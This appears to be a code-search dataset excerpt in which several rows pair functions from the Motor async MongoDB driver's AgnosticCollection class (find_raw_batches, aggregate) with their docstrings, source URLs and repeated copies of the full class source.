drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.find_raw_batches | python | def find_raw_batches(self, *args, **kwargs):
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self) | Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0 | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L573-L599 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.aggregate | python | def aggregate(self, pipeline, **kwargs):
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs)) | Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L601-L662 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
